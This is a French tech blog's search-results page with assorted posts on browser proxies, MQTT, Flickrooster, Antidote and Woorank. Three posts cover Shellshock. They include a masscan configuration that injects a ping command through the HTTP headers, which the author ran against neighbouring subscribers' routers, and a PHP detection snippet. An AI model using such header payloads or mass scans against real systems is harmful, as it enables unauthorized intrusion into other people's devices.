Recherche

Votre recherche de internet a donné 394 résultats.

chrome-extension.jpg

Vous utilisez assez régulièrement des proxy pour surfer sur Internet ? Vous trouvez comme moi que l'activation de proxy n'est pas simple depuis l'interface de Chrome ?

Voici un plugin Chrome qui vous simplifiera la configuration de l'utilisation de votre proxy au sein de votre navigateur. Il s'agit de Proxy SwitchyOmega noté 4.68 étoiles sur 5 sur le Webstore et utilisé par pas moins de 280 000 utilisateurs.

Il vous permet de changer rapidement de configuration de proxy soit de manière automatique en fonction de certaines règles configurables, soit de manière manuelle en cliquant tout simplement sur le bouton du plugin présent dans la barre de navigation.

switchyomega.jpg

Plugin à installer si vous ne l'utilisez pas déjà.


Crédits photo Tsahi Levent-Levi

Vous utilisez Internet depuis la fin des années 90 ? Voici une petite rétrospective musicale et humoristique de ce qu'était Internet à cet époque : Caramail, Lycos, iBazar, Winamp ...


Vous vous en souvenez de cette époque ?

web2day_2015.png

Le Web2day offre un condensé des dernières tendances et des meilleures pratiques en matière d’innovation. A l’occasion de différentes conférences, workshops, showroom, concours de startups, soirées, tous les professionnels du numérique de France et de partout ailleurs en Europe, se retrouvent, pendant 3 jours, pour « faire le plein » de nouveautés, d’inspiration et de rencontres.

Pour cette édition 2015 qui se déroulera du 3 à 5 juin, ce sont plus de 2 300 passionnés de nouvelles technologies (entrepreneurs, sponsors, professionnels du web et du numérique, technophiles, étudiants, journalistes, blogueurs,…) et plus de 130 speakers internationaux de renoms qui sont attendus en juin prochain.

Le programme des 130 conférences, débats, workshops organisés tout au long des 3 jours s’articulera autour des 5 grandes thématiques suivantes :

  • Entrepreneuriat (startup, financement, accélérateur…),
  • Expertise métier (échange de bonnes pratiques),
  • Internet of everything (objets connectés, e-santé...),
  • Innovation responsable (« green », économie collaborative, politiques numériques & territoire)
  • Et un plus impertinent « What the fuck ? » (regroupant des sujets prospectifs, décalés, sociétaux…).

A noter qu’en marge de cette programmation, le web2day accueillera également :

  • Un concours international de startups (« Le global challenge») afin de faciliter le lien entre la cinquantaine de jeunes pousses retenues à cette occasion et les fonds d’investissement présents à Nantes, pour le concours.
  • Une Tech Zone,
  • Un showroom sur lequel sera présenté toute une panoplie d’objets connectés.

Les pass 3 jours "Early Bird" sont d'ores et déjà disponibles sur le site du Web2day au tarif de 189€ au lieu de 249€.

Si l’événement vous intéresse, n'hésitez pas à réserver vos places dès maintenant avant salle comble.

mqttorg-glow.png

Connaissez-vous le MQTT ? Il s'agit d'un standard OASIS permettant de simplifier la communication machine à machine (M2M), idéalement conçu pour l'Internet des objets.

MQTT is a machine-to-machine (M2M)/"Internet of Things" connectivity protocol. It was designed as an extremely lightweight publish/subscribe messaging transport. It is useful for connections with remote locations where a small code footprint is required and/or network bandwidth is at a premium. For example, it has been used in sensors communicating to a broker via satellite link, over occasional dial-up connections with healthcare providers, and in a range of home automation and small device scenarios. It is also ideal for mobile applications because of its small size, low power usage, minimised data packets, and efficient distribution of information to one or many receivers.

C'est sympa, mais cela signifie quoi dans la pratique ?

Et bien cela ressemble à un bus d’événement très simple à contacter sur lequel des producteurs et des consommateurs de message peuvent s'abonner.

broker.png

Il existe de nombreuses implémentations de broker MQTT sur Internet. L'un des plus simples à utiliser est très certainement Mosca, une implémentation NodeJS de MQTT ultra-configurable et adaptable à tout besoin. Quelques lignes de code Javascript permettent d'instancier son propre serveur MQTT.

Pour des besoins plus lourds, notamment l'exposition REST/COAP des objets, il est possible d'utiliser Eclipse Ponte une surcouche de Mosca actuellement en incubation à la fondation Eclipse.

architecture-ponte.png

Ensuite si vous souhaitez ajouter de l’intelligence à votre broker MQTT, la solution la plus simple est de connecter une instance Node-Red à votre broker MQTT.

node-red-screenshot2.png

Vous pourrez créer les scénarios de votre choix, orchestrer des actions dès lors qu'un certain événement arrive sur le broker ...

C'est autour de ces deux produits que je suis en train de revoir l'architecture de mon logiciel de domotique pour les geeks : Domogeeek. Une branche de développement a été créée spécifiquement pour la migration. Le gros avantage du MQTT est que les producteurs de messages et les consommateurs peuvent être répartis sur différentes machines.

Je vous tiendrai au courant de mes avancements, une v1.0 devrait bientôt voir le jour dès que tous les modules auront été migrés.

flickrooster.png

Si vous êtes lecteur assidu du blog, vous devriez savoir que j'ai publié sur Internet un site qui classe les meilleurs photographes sur Flickr : Flickrooster.

Le classement réalisé est mensuel, il vous permet de découvrir les photographes qui ont le plus de photos classées dans la liste "Explore" de Flickr.

Tous les jours, à 20 heures, Flickrooster récupère la liste des 500 meilleures photos auprès de l'API Flickr "Explore" et attribue des points aux photographes qui ont pris des photos présentes dans cette liste. En fonction de la position de la photo dans la liste, le photographe qui a pris la photo obtient entre 500 et 1 point. A la fin de chaque mois, le classement repart à zéro et les nouvelles photos sont comptabilisées pour le mois suivant.

Flickrooster permet très rapidement de découvrir les photographes influents de la plateforme Flickr.

Après plus de 4 années de fonctionnement (août 2010), Flickrooster a analysé autour de 800 000 photos classées dans l'Explore de Flickr. Sur la base de ces données récoltées, j'ai généré un classement des meilleurs photographes Flickr.

Ce classement est disponible ici : http://www.flickrooster.com/top/

flickrooster-top-photographers-4years.jpg

Le meilleur photographe est Samyaoo qui a réussi à publier 278 photos dans l'explored et a obtenu 86 669 points. Impressionnant ! Le 100 ème du classement a tout de même obtenu 1/3 du score du premier avec 103 photos classées dans l'Explore de Flickr.

Pour accéder à votre historique Flickrooster, vous pouvez vous rendre directement sur l'URL suivante :

http://www.flickrooster.com/profile/<votre id flickr>

Vous avez aussi la possibilité de rechercher votre page de profil directement depuis le formulaire en entête du site Internet Flickrooster. Si vous avez des questions ou des commentaires sur ce service, n'hésitez pas à me laisser un commentaire.

Bonne navigation !

antidote-8.jpg

J'ai testé pour vous le logiciel Antidote 8, un correcteur orthographique et grammatical avec des aides à la rédaction, développé par Druide et disponible sur Windows, Mac et Linux.

Le logiciel Antidote ne date pas d'aujourd'hui, vous pouviez le retrouver assez simplement sous forme de boîte chez de nombreux magasins informatiques. On peut se demander quelle est l'utilité d'un tel logiciel. Je vais tenter de vous donner mon point de vue sur le produit de manière brève et synthétique, mais aussi sans erreur orthographique !

Une détection fine des erreurs

Antidote arrive à détecter de nombreuses erreurs non détectables par des correcteurs classiques fournis par Windows Word, Chrome, Thunderbirds... Antidote vous permettra d'aller plus loin dans la correction de vos écrits et l'amélioration de l'utilisation de la langue française. Antidote supporte aussi les variantes de l'usage de la langue française en fonction de la région d'appartenance et supporte aussi l'orthographe française rectifiée.

En plus de vous notifier vos erreurs, Antidote est capable de réaliser des analyses sur le texte proposé à la correction : Analyse des connotations négatives/positives, répétition de mots, utilisation de termes familiers ... À la suite à cette analyse, Antidote vous donnera une note entre 1 et 5 sur la qualité de votre texte, 1 correspondant au niveau de Novice et 5 au niveau de Druide bien sûr.

Mon premier retour suite à l'utilisation d'Antidote sur quelques-uns des articles du blog est positif. Antidote arrive à débusquer des erreurs d’orthographe et de conjugaison sur des articles que j'avais lus et relus plusieurs fois. Antidote n'est cependant pas infaillible et sur certains cas il peut malheureusement se tromper. C'est pourquoi il est nécessaire de valider une à une les propositions de correction linguistique en s'aidant des explications fournies par Antidote ; les propositions de correction typographiques peuvent quant à elles être validées dans leur ensemble.

antidote-screenshot.jpg

Des dictionnaires riches

Si vous souhaitez améliorer votre lexique, éviter les répétitions, Antidote propose ni plus ni moins que 10 dictionnaires : définitions, synonymes, antonymes, cooccurrences, champ lexical, conjugaison, famille, citations, historique, illustrations. Le dictionnaire des cooccurrences est vraiment très intéressant, il propose des assemblages de mots en fonction de leur utilisation courante. Sachez que ce dictionnaire de cooccurrences créé sous forme numérique est désormais disponible sous forme de dictionnaire papier.

Une intégration native avec de nombreux outils

Antidote s'intègre nativement avec de nombreux logiciels du marché grâce à des plug-ins mis à disposition automatiquement : Suite Windows Office, Clients mails tels que Thunderbirds, Navigateurs Web connus... Son module "Anti-Oups!" vous permet même d'éviter d'envoyer par email des emails contenant des erreurs d'orthographe importantes. La correction orthographique d'Antidote est aussi prise en charge sur les "textarea" des sites Internet au travers votre navigateur Web. Le remplacement à chaud de la source est appliqué automatiquement dès lors qu'une correction est réalisée sur l'application Antidote.

Antidote ne s'arrête pas là, si jamais vous développez un logiciel qui offre aux utilisateurs de l'édition de texte, il est possible d'obtenir le détail de l'API d'Antidote auprès de son éditeur. Un module Windows COM est disponible pour interagir avec Antidote et permettre à Antidote de modifier en temps réel le contenu corrigé.

Synthèse

Antidote est aujourd'hui l'un des meilleurs logiciels de correction d'orthographe du marché. Antidote est disponible en ligne sur la boutique en ligne de MySoft. Sa version numérique ou sa version boîte est au même tarif : 119 €. Pour les particuliers, la licence autorise une installation jusqu'à trois postes différents, pour les professionnels des volumes de licence sont disponibles.

La fiche descriptive complète du logiciel est disponible sur le site de MySoft.


Cet article a obtenu le niveau Druide d'Antidote ;-)

Shellshock http header

Vous êtes plusieurs à m'avoir demandé plus d'informations sur la faille Shellshock et l'impact qu'elle peut avoir sur des machines connectées à Internet.

Voici un bref test réalisé sur une plage d'IP /24 d'un DSLAM Free démontant que de nombreuses personnes connectées à Internet semblent être vulnérables à la faille Shellshock découverte récemment sur Bash par un français.

Le test démontré consiste à envoyer à un ensemble de machines/box connectées à Internet un paquet HTTP forgé avec des entêtes HTTP contenant une injection de commande. Toutes les machines vulnérables qui passeront les valeurs des entêtes HTTP sous forme de variables Bash exécuteront la commande indiquée dans la requête sans le vouloir.

Dans le cas présent, l'instruction transmise aux machines est de m'envoyer un Ping réseau. Toutes les machines vulnérables à Shellshock au travers de leur serveur Web obéiront à ma demande et m'enverront un Ping.

Cette attaque est totalement bénin pour les machines distantes, mais elle démontre qu'un grand nombre de machines/box connectées à Internet sont vulnérables à ce type d'attaque.


Soyez très vigilant, il est probable que d'ici les prochains jours des vers / trojans se déploient largement sur le réseau via l'utilisation de cette faille de sécurité importante.

php shellshock

Voici un petit script PHP permettant d'identifier rapidement des tentatives d'attaque Shellshok sur son serveur PHP.

Les attaques se trahissent par la présence des caractères '()' en début de chaîne d'entête HTTP.

<?php

// index.php  à la racine du serveur

function startsWith($haystack, $needle)
{
    return $needle === "" || strpos($haystack, $needle) === 0;
}

if ((startsWith($_SERVER['HTTP_COOKIE'],('()')))
||(startsWith($_SERVER['HTTP_REFERER'],('()')))
|| (startsWith($_SERVER['HTTP_HOST'],('()')))){
   
        // Tentative d'attaque logguée
        file_put_contents('attaques.log', $_SERVER['REMOTE_ADDR'].PHP_EOL,FILE_APPEND);
};

.....

Vous devriez voir le fichier "attaques.log" énormément grossir d'ici les prochains jours. La récente faille détectée dans Bash devrait avoir un impact non négligeable sur le trafic Internet. Des vers utilisant la vulnérabilité Shellshok devraient probablement circuler sur la toile d'ici les prochains jours .

Freebox Shellshock

Après être tombé sur un article intéressant sur l'exploitation à distance de la faille de sécurité "shellshock" trouvée récemment sur Bash par un Français. Je me suis amusé à tester les Freebox et autres boîtiers ADSL connectés à mon DSLAM, le résultat de mon test est assez intéressant inquiétant.

J'ai suivi l'astuce de Robert Graham sur l'utilisation de l'utilitaire masscan pour détecter les machines connectées à Internet vulnérables à la faille de sécurité "Shellshock.

J'ai donc compilé l'application masscan sur mon serveur avec le patch de Robert Graham permettant de modifier des entêtes HTTP.

$ sudo apt-get install git gcc make libpcap-dev
$ git clone https://github.com/robertdavidgraham/masscan
$ cd masscan/src/
$ rm proto-http.c
$ wget https://raw.githubusercontent.com/robertdavidgraham/masscan/master/src/proto-http.c
$ cd ..
$ make

J'ai repris le fichier de configuration de Robert Graham et je l'ai adapté la plage d'IP aux clients de Free connectés à mon DSLAM, l'histoire d'avoir une idée de la sensibilité des box de Free à cette nouvelle faille de sécurité qui secoue actuellement Internet.

target-ip = x.x.x.x/24
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 62.210.208.20
http-header[Host] = () { :; }; ping -c 3 62.210.208.20
http-header[Referer] = () { :; }; ping -c 3 62.210.208.20

Cette configuration de masscan injecte une commande shell dans les entêtes HTTP Cookie, Host et Referer. Si le serveur distant est vulnérable à la faille de sécurité "Shellshock" et que l'une des variables Cookie, Host et Referer est utilisée comme variable d'environnement lors de l'appel à un module CGI, un ping devrait automatiquement arriver sur mon serveur.

Je lance donc deux terminaux sur ma machine. Sur le premier terminal je lance un tcpdump pour afficher toutes les requêtes Ping entrantes et me permettre d'identifier toutes les machines vulnérables.

sudo tcpdump -v icmp

Sur le second terminal, je lance le masscan :

sudo ./masscan -c masscan.conf

Le résultat est assez surprenant, sur la plage d'IP de ma freebox chez Free, je découvre 15 Freebox Révolution allumées acceptant des requêtes sur le port 80. Mais heureusement, aucune d'entre elles ne me ping ... (c'est rassurant).

Cependant, ma machine reçoit 4 pings provenant de 4 box qui semblent être vulnérables à la faille "Shellshock" via l'injection de commandes shell par entêtes HTTP.

Les 4 box détectées ne répondent pas au ping et leurs ports semblent être filtrés (incorrectement si mes requêtes m'ont permis d'exécuter une commande shell sur ces box).

Je n'ai malheureusement pour le moment, aucune idée de quelle box il s'agit. Nmap ne m'a fourni aucune information exploitable ... D'après mes tests, les commandes shell transmises semblent être correctement interprétées par les box distantes, ce qui signifie qu'un cracker pourrait s'introduire sur votre réseau local ou avoir accès à l'ensemble des pages Web sur lesquels vous allez.

S'agit-il de la Freebox V5 ou de la Freebox Crystal ? Ou bien d'un NAS Synology connecté sur le port 80 de la Freebox ?


Update 01/10/2014 : Erratum, la transmission des ping par les machines cibles semble être un comportement naturel et n'est pas lié à une faille de sécurité. Les machines transmettent une requête ping dès qu'elle reçoivent une requête HTTP .... Étrange !

woorank-geek.png

Vous avez un site Internet et vous souhaitez connaitre les impondérables à respecter pour le bon référencement de votre site ?

Woorank fournit un service d'analyse de site en ligne, vous permettant d'identifier en quelques secondes un ensemble d'optimisations techniques possibles.

Le service est gratuit le premier appel, au second rapport Woorank vous demandera d'acheter une licence d'utilisation du service. Un filtrage IP sur la plateforme vous interdit de réaliser deux analyses gratuites successives. Pour obtenir un rapport détaillé, il vous faudra débourser tout de même la somme de 39€ / mois pour un site Internet.

C'est l'outil idéal pour commencer une stratégie SEO et identifier les points techniques faibles de votre site. Le rapport gratuit offre un premier ensemble d'éléments à corriger et vous donnera une note sur 100 pour qualifier la capacité de votre site à être correctement référencé sur les moteurs de recherche.

Pour essayer l'outil, cela se passe ici : http://www.woorank.com